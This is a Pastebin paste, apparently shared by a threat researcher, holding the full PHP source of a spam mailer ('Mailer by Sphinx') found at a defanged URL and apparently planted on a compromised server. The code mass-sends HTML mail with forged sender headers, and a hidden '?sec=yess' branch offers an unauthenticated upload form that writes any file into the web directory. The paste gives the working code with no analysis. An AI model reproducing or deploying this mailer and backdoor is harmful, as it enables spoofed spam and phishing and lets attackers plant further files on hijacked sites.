Advertisement
Neonprimetime

2018-11-06 ‪oikgmf[.]com/ABLEGOD.php‬

Nov 6th, 2018
744
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.69 KB | None | 0 0
  1. Mailer
  2.  
  3. <?php
  4. @set_time_limit(0);
  5. if(isset($_POST['Enoc']))
  6. {
  7. $message = $_POST['html'];
  8. $subject = $_POST['assunto'];
  9. $de = $_POST['de'];
  10. $nombre = $_POST['RealName'];
  11. $ellos = $_POST['ellos'];
  12.  
  13. $message = urlencode($message);
  14. $message = ereg_replace("%5C%22", "%22", $message);
  15. $message = urldecode($message);
  16. $message = stripslashes($message);
  17.  
  18. }else{
  19. $testa ="";
  20. $message = "<html><body><h1>hola my friend, How are u ?</h1></body></html>";
  21. $subject = $_SERVER["HTTP_HOST"];
  22. $nombre = "mailer";
  23. $ellos = "[email protected]";
  24. }
  25. ?>
  26. <html>
  27. <head>
  28. <title> Mailer by Sphinx</title></head>
  29. </head>
  30. <body style="font-family: Arial; font-size: 11px">
  31. <center>
  32. <form action="" method="post" enctype="multipart/form-data" name="form1">
  33. <br><table width="534" height="248" border="0" cellpadding="0" cellspacing="1" bgcolor="#0000CC" class="normal">
  34. <tr>
  35. <td>
  36. <table border="0" bgcolor="#FFFFFF" width="95%">
  37. <tr>
  38. <td>
  39. <table border="0" width="100%">
  40. <tr>
  41. <td width="359">Email: <input name="de" type="text" class="form" id="de" size="30" value="<? print $de; ?>"></td>
  42. <td>Nombre: <input name="RealName" type="text" class="form" id="RealName" size="30" value="<? print $nombre; ?>"></td>
  43. </tr>
  44. </table>
  45. </td>
  46. </tr>
  47. <tr>
  48. <td>Asunto: <input name="assunto" type="text" class="form" id="assunto" size="78" value="<? print $subject; ?>"></td>
  49. </tr>
  50. <tr>
  51. <td height="18" bgcolor="#C0C0C0"></td>
  52. </tr>
  53. <tr>
  54. <td>
  55. <table border="0" width="100%">
  56. <tr>
  57. <td>
  58. <textarea name="html" cols="66" rows="10" id="html"><? print $message; ?></textarea></td>
  59. <td><textarea rows="10" name="ellos" cols="35"><? print $ellos; ?></textarea></td>
  60. </tr>
  61. </table>
  62. </td>
  63. </tr>
  64. <tr>
  65. <td><center>
  66. <br><input type="submit" name="Enoc" value="Enviar"></center><br>
  67. <?php
  68. if($_GET['sec']=='yess')
  69. {
  70. echo '<form action="" method="post" enctype="multipart/form-data">
  71. <input name="archivo" type="file" size="35" />
  72. <input name="enviar" type="submit" value="Upload File" />
  73. <input name="action" type="hidden" value="upload" />
  74. </form>';
  75.  
  76. $status = "";
  77. if ($_POST["action"] == "upload")
  78. {
  79. $tamano = $_FILES["archivo"]['size'];
  80. $tipo = $_FILES["archivo"]['type'];
  81. $archivo = $_FILES["archivo"]['name'];
  82.  
  83. if ($archivo != "")
  84. {
  85. if (copy($_FILES['archivo']['tmp_name'],"./".$archivo))
  86. {
  87. $status = "Archivo subido: <b>".$archivo."</b>";
  88. }else{
  89. $status = "Error al subir el archivo";
  90. }
  91. } else {
  92. $status = "Error al subir archivo";
  93. }
  94. echo $status;
  95. }
  96. }
  97. if(!isset($_POST['Enoc'])){
  98. exit;
  99. }
  100.  
  101. if(!isset($_GET['c']))
  102. {
  103. $email = explode("\n", $ellos);
  104. }else{
  105. $email = explode(",", $ellos);
  106. }
  107. $son = count($email);
  108.  
  109. if(!isset($_GET['e'])){
  110. $header = "MIME-Version: 1.0\n";
  111. $header .= "Content-type: text/html; charset=iso-8859-1\n";
  112. $header .= "From: ".$nombre . " <" . $de . ">\n";
  113. $header .= "Reply-To: " . $de . "\n";
  114. $header .= "X-Priority: 3\n";
  115. $header .= "X-MSMail-Priority: Normal\n";
  116. $header .= "X-Mailer: ".$_SERVER["HTTP_HOST"];
  117. }else{
  118. $header ='MIME-Version: 1.0' . "\r\n";
  119. $header .= 'Content-type: text/html' . "\r\n";
  120. $header .="From: ".$de;
  121. }
  122. $i = 0;
  123. $voy=1;
  124. while($email[$i])
  125. {
  126. if(isset($_GET['time']) && isset($_GET['cant'])){
  127. if(fmod($i,$_GET['cant'])==0 && $i>0){
  128. print "----------------------------------> wait ".$_GET['time']." Segs. Sending to ".$_GET['notf']."...<br>\n";
  129. flush();
  130. @mail($_GET['notf'], $subject, $message, $header);
  131. sleep($_GET['time']);
  132. }
  133. }
  134. $mail = str_replace(array("\n","\r\n"),'',$email[$i]);
  135. $message1 = ereg_replace("&email&", $mail, $message);
  136. if(@mail($mail, $subject, $message1, $header))
  137. {
  138. print "<font color=blue face=verdana size=1> ".$voy." de ".$son." ;-) ".trim($mail)." okey dokey!</font><br>\n";
  139. flush();
  140. }
  141. else
  142. {
  143. print "<font color=red face=verdana size=1> ".$voy." de ".$son.":-( ".trim($mail)." Error te digo altoquesein!!</font><br>\n";
  144. flush();
  145. }
  146. $i++;
  147. $voy++;
  148. }
  149. echo "<script> alert('---Todos Spammed---'); </script>";
  150. ?>
  151. </td>
  152. </tr>
  153. </table>
  154. </td>
  155. </tr>
  156. </table>
  157. </body>
  158. </form>
  159. </center>
  160. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement